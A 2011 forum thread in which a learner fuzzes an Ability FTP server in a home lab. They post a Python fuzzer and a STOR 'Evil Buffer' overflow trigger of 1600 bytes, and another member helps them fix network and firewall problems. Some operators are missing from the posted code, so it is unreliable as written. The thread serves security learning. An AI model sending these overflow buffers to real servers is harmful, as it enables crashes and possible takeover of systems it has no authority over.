LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Server (https://www.linuxquestions.org/questions/linux-server-73/)
-   -   Fuzzing - Buffer Overflow - Ability Server - Could not Connect to FTP Server (https://www.linuxquestions.org/questions/linux-server-73/fuzzing-buffer-overflow-ability-server-could-not-connect-to-ftp-server-883380/)

lee_can 05-29-2011 01:39 PM
Fuzzing - Buffer Overflow - Ability Server - Could not Connect to FTP Server
 
Hi,
i am trying to send malformed string into ability ftp server in order to have some unexpected crashes.

i login in into the ability ftp server on my window 7.
On my virtual machine,i am working on a backtrack 4, i tried to send some string to have some unexpected crashes, but i couldn't success.
here is the code:

PHP Code:
#!/usr/bin/python
import socket

# Create an array of buffers, from 20 to 2000, with increments of 20.
buffer=["A"]
counter=20
while len(buffer) <= 100:
        buffer.append("A"*counter)
        counter=counter+20

# Define the FTP commands to be fuzzed
commands=["MKD","CWD","STOR"]

# Run the fuzzing loop
for command in commands:
        for string in buffer:
                print "Fuzzing" command ":" +str(len(string))
                s=socket.socket(socket.AF_INETsocket.SOCK_STREAM)
                connect=s.connect(('192.168.8.23',21))
                s.recv(1024)
                s.send('USER_TEST ftp\r\n')
                s.recv(1024)
                s.send('12345 ftp\r\n')
                s.recv(1024)
                s.send(command ' ' string '\r\n')
                s.recv(1024)
                s.send('QUIT\r\n')
                s.close() 
I just want to login to the ftp, with username: "USER_TEST" and pass: "12345"on my window 7 machine (ip 192.168.8.23), but it gave me this:
Quote:
root@bt:~/Files/Script/bufferflow# ./simple-fuzzer.py
FuzzingMKD:1
Traceback (most recent call last):
File "./simple-fuzzer.py", line 19, in <module>
connect=s.connect(('192.168.8.23',21))
File "<string>", line 1, in connect
socket.error: (110, 'Connection timed out')
an anyone advise please?
Regards

kbp 05-29-2011 05:51 PM
Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.

lee_can 05-29-2011 09:59 PM
Quote:
Originally Posted by kbp (Post 4370475)
Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.
Hi kbp,
ftplib didnt works with me too, it gave me cannot connect to server, when i go back home, i will show the script.

Regards

kbp 05-30-2011 06:29 AM
Then maybe it's a connection/firewall problem, please check basic connectivity (ping) and ensure any firewalls are allowing ftp traffic. It's easiest to turn them off considering this is just a test host.

lee_can 05-30-2011 12:02 PM
Quote:
Originally Posted by kbp (Post 4370475)
Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.
appreciate your help kbp
regarding the ftplib,i tried a script from this website.
here is the script:
PHP Code:
import ftplib
from ftplib import FTP

buffer '\x41'*1600
try:
   # Edit the IP, Username and Password.
   ftp FTP('192.168.8.23')
   ftp.login('USER_TEST','12345')
   print "\nEvil Buffer sent..."
except:
   print "\nCould not Connect to FTP Server."
try:
   ftp.transfercmd("STOR " buffer)
except:
   print "\nDone." 
So, when i tried to run this script, i got this error:
Code:
root@bt: ./test.py
./test.py: line 4: buffer: command not found
./test.py: line 5: try:: command not found
./test.py: line 7: syntax error near unexpected token `('
./test.py: line 7: `  ftp = FTP('192.168.8.23') '
I am still new in this linux system
thanks in advance for your help.

kbp 05-31-2011 05:32 PM
You'll need to tell the OS which interpreter to execute the script with, please add :-

Code:
#!/usr/bin/env python
as the first line in your script

lee_can 06-01-2011 11:56 AM
Quote:
Originally Posted by kbp (Post 4372418)
You'll need to tell the OS which interpreter to execute the script with, please add :-

Code:
#!/usr/bin/env python
as the first line in your script
thanks kbp for yout help, well i add the above line, but still cannot connect:

oot@bt:~/Files/Script/bufferflow# ./test.py

Could not Connect to FTP Server.

Done.

i dont know why

kbp 06-01-2011 05:48 PM
So you still have a connection problem ... lets start at the start, please run these tests in order and post the results:-

From the linux machine:
- ping 192.168.8.23
- telnet 192.168.8.23 21

From the Windows machine:
- ping <ip_of_linux_machine>
- netstat -a -p tcp | findstr 21

lee_can 06-02-2011 11:12 AM
Hi kbp,
please find below the output:
Code:
root@bt:~# ping 192.168.8.23
PING 192.168.8.23 (192.168.8.23) 56(84) bytes of data.
64 bytes from 192.168.8.23: icmp_seq=1 ttl=128 time=0.825 ms
64 bytes from 192.168.8.23: icmp_seq=2 ttl=128 time=1.50 ms
64 bytes from 192.168.8.23: icmp_seq=3 ttl=128 time=5.39 ms
64 bytes from 192.168.8.23: icmp_seq=4 ttl=128 time=0.456 ms
^Z
[2]+  Stopped                ping 192.168.8.23
root@bt:~#
Code:
root@bt:~# telnet 192.168.8.23 21
Trying 192.168.8.23...
telnet: Unable to connect to remote host: Connection timed out
root@bt:~#
Code:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\W1>ping 192.168.8.36

Pinging 192.168.8.36 with 32 bytes of data:
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.8.36:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
Code:
C:\Users\W1>netstat -a -p tcp | findstr 21
  TCP    0.0.0.0:21            W1-PC:0                LISTENING

C:\Users\W1>
I really appreciate your help.
Regards

kbp 06-02-2011 08:35 PM
It's probably the Windows Firewall .. do you need help to modify it ?

lee_can 06-02-2011 09:58 PM
Quote:
Originally Posted by kbp (Post 4374634)
It's probably the Windows Firewall .. do you need help to modify it ?
If you dont mind, as still i am newbie in this world and trying to learn.

kbp 06-03-2011 08:41 AM
In the "Control Panel" you'll find "Windows Firewall" - open it. There should be checkboxes that say "notify me when windows firewall blocks a new program" - ensure they're checked and the "block all incoming connections .. " ones are not.

The next time you attempt to connect to the ftp server a message should appear asking if you want to allow the access - say yes.

lee_can 06-03-2011 12:39 PM
Quote:
Originally Posted by kbp (Post 4375106)
In the "Control Panel" you'll find "Windows Firewall" - open it. There should be checkboxes that say "notify me when windows firewall blocks a new program" - ensure they're checked and the "block all incoming connections .. " ones are not.

The next time you attempt to connect to the ftp server a message should appear asking if you want to allow the access - say yes.
I dont know how to thank you kbp, really thank you very much.
every thing is fine now, i can continue now ...
Best regards


All times are GMT -5. The time now is 06:31 PM.